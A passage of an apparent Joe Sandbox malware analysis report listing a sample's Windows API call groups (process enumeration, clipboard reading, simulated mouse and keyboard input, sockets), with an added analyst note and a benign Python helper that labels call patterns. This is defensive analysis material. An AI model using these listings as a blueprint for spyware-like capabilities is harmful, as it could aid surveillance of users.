                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                          • API String ID: 0-2872873767
                                                                          • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                          • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                          • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                          • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                          APIs
                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                          • __wsplitpath.LIBCMT ref: 00475644
                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                          • _wcscat.LIBCMT ref: 00475657
                                                                          • __wcsicoll.LIBCMT ref: 0047567B
                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                          • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                          • String ID:
                                                                          • API String ID: 2547909840-0
                                                                          • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                          • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                          • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                          • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                          • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                          • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                          • FindClose.KERNEL32(?), ref: 004525FF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                          • String ID: *.*$\VH
                                                                          • API String ID: 2786137511-2657498754
                                                                          • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                          • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                          • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                          • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                          • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                          • String ID: pqI
                                                                          • API String ID: 2579439406-2459173057
                                                                          • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                          • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                          • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                          • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
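Analyst note on the listings above. The sequence IsDebuggerPresent, SetUnhandledExceptionFilter(0), UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess with status C0000409 (STATUS_STACK_BUFFER_OVERRUN) is the MSVC CRT's /GS stack-cookie failure routine (__report_gsfailure), present in every /GS-compiled binary; for this function the "IsDebuggerPresent" hit is compiler boilerplate, not an evasion check, and the "pqI" argument is the address of the static EXCEPTION_POINTERS record (bytes 70 71 49 00, i.e. 0x00497170 in the .data range listed above) printed as text rather than a real string. The other listings in this section are similarly readable from their arguments: FindResourceW with type 0000000E and 00000003 is RT_GROUP_ICON and RT_ICON (icon handling; an embedded payload would more usually sit in RT_RCDATA), socket(00000002,00000001,00000006) is AF_INET/SOCK_STREAM/IPPROTO_TCP followed by bind and listen with a backlog of 5, and the CreateToolhelp32Snapshot/Process32FirstW/Process32NextW walk selects a process by a case-insensitive name compare (__wcsicoll). The helper below is an added example, not Joe Sandbox tooling: it parses the report's "• Api.MODULE(args), ref: ADDR" lines and labels those four patterns so that runtime boilerplate is separated from the calls that matter. The pattern names and labels are my own; the sample listings are copied from this report.

```python
"""Added triage helper (not Joe Sandbox tooling): parse the "APIs" listings in this
report and label well-known call patterns; pattern names below are my own."""
from __future__ import annotations
import re
from dataclasses import dataclass

# A call line as printed, e.g. "• GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD"
# or "• Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50".
CALL_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
STATUS_STACK_BUFFER_OVERRUN = 0xC0000409        # exit status used by __report_gsfailure
RESOURCE_TYPES = {3: "RT_ICON", 10: "RT_RCDATA", 14: "RT_GROUP_ICON"}

@dataclass(frozen=True)
class Call:
    name: str
    module: str
    args: tuple[str, ...]   # arguments exactly as printed: "?", "C0000409", ...
    ref: int                # call-site address
    subcall: bool           # True for "Part of subcall function ..." lines

def parse_calls(listing: str) -> list[Call]:
    """Extract call lines; headers such as 'APIs' / 'Strings' are skipped."""
    calls = []
    for line in listing.splitlines():
        m = CALL_RE.match(line)
        if m is None:
            continue
        raw = m["args"] or ""
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(Call(m["name"], m["module"], args, int(m["ref"], 16), m["sub"] is not None))
    return calls

def as_int(arg: str) -> int | None:
    """Arguments are hex; '?' and pointers rendered as text ('pqI') give None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None

def classify(listing: str) -> list[str]:
    own = [c for c in parse_calls(listing) if not c.subcall]
    names = {c.name for c in own}
    ints = {as_int(a) for c in own for a in c.args} - {None}
    found = []
    # MSVC CRT /GS cookie failure (__report_gsfailure): IsDebuggerPresent, clear the
    # unhandled-exception filter, raise, TerminateProcess(STATUS_STACK_BUFFER_OVERRUN).
    # Compiler boilerplate, so this IsDebuggerPresent is not an anti-debug check.
    if ({"IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter",
         "TerminateProcess"} <= names and STATUS_STACK_BUFFER_OVERRUN in ints):
        found.append("crt-gs-failure-handler (IsDebuggerPresent is CRT boilerplate)")
    # Toolhelp32 walk; __wcsicoll means the target is chosen by case-insensitive name.
    if {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"} <= names:
        how = "case-insensitive name match" if "__wcsicoll" in names else "filter unknown"
        found.append(f"process-enumeration ({how})")
    # socket(af, type, proto) + bind + listen; (2, 1, 6) = AF_INET, SOCK_STREAM, IPPROTO_TCP.
    sock = next((c for c in own if c.name == "socket"), None)
    if sock is not None and {"bind", "listen"} <= names:
        triple = tuple(as_int(a) for a in sock.args[:3])
        found.append(f"listening-socket ({'TCP' if triple == (2, 1, 6) else triple})")
    # FindResourceW(hModule, name, type): the third argument is the resource type.
    types = sorted({as_int(c.args[2]) for c in own
                    if c.name == "FindResourceW" and len(c.args) >= 3} - {None})
    if types and {"LoadResource", "LockResource"} <= names:
        found.append("resource-load (%s)" % ", ".join(
            RESOURCE_TYPES.get(t, f"type {t}") for t in types))
    return found

# Listings copied from this report's own "APIs" sections (constructed sample input).
SAMPLES = {
    "gs_failure": """
        • IsDebuggerPresent.KERNEL32 ref: 00421FC1
        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
        • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
        • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
        • TerminateProcess.KERNEL32(00000000), ref: 00422004""",
    "toolhelp": """
        • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
        • __wsplitpath.LIBCMT ref: 00475644
          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
        • __wcsicoll.LIBCMT ref: 0047567B
        • Process32NextW.KERNEL32(00000000,?), ref: 004756AB""",
    "listener": """
        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
        • bind.WSOCK32(00000000,?,00000010), ref: 00465356
        • listen.WSOCK32(00000000,00000005), ref: 00465381""",
    "resources": """
        • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
        • LoadResource.KERNEL32(?,00000000), ref: 004330BD
        • LockResource.KERNEL32(00000000), ref: 004330CA
        • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7""",
}
```

Calling classify(SAMPLES["gs_failure"]) returns a single label naming the CRT handler, and the same call on any other "APIs" block pasted from this report returns the matching labels or an empty list when no pattern applies; the arguments are kept as printed because "?" (unknown at analysis time) and misrendered pointers must not be confused with real constants.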
                                                                          APIs
                                                                          • __wcsicoll.LIBCMT ref: 00433349
                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                          • __wcsicoll.LIBCMT ref: 00433375
                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicollmouse_event
                                                                          • String ID: DOWN
                                                                          • API String ID: 1033544147-711622031
                                                                          • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                          • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                          • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                          • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                          • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                          • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                          • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: KeyboardMessagePostState$InputSend
                                                                          • String ID:
                                                                          • API String ID: 3031425849-0
                                                                          • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                          • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                          • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                          • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                          APIs
                                                                            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 4170576061-0
                                                                          • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                          • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                          • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                          • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                          APIs
                                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                          • IsWindowVisible.USER32 ref: 0047A368
                                                                          • IsWindowEnabled.USER32 ref: 0047A378
                                                                          • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                          • IsIconic.USER32 ref: 0047A393
                                                                          • IsZoomed.USER32 ref: 0047A3A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                          • String ID:
                                                                          • API String ID: 292994002-0
                                                                          • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                          • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                          • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                          • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                          APIs
                                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                          • CoInitialize.OLE32(00000000), ref: 00478442
                                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                          • CoUninitialize.OLE32 ref: 0047863C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                          • String ID: .lnk
                                                                          • API String ID: 886957087-24824748
                                                                          • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                          • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                          • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                          • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                          APIs
                                                                          • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                          • CloseClipboard.USER32 ref: 0046DD0D
                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                          • CloseClipboard.USER32 ref: 0046DD41
                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                          • CloseClipboard.USER32 ref: 0046DD99
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                          • String ID:
                                                                          • API String ID: 15083398-0
                                                                          • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                          • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                          • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                          • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: U$\
                                                                          • API String ID: 4104443479-100911408
                                                                          • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                          • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                          • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                          • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                          • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                          • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                          • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                          APIs
                                                                          • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                          • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
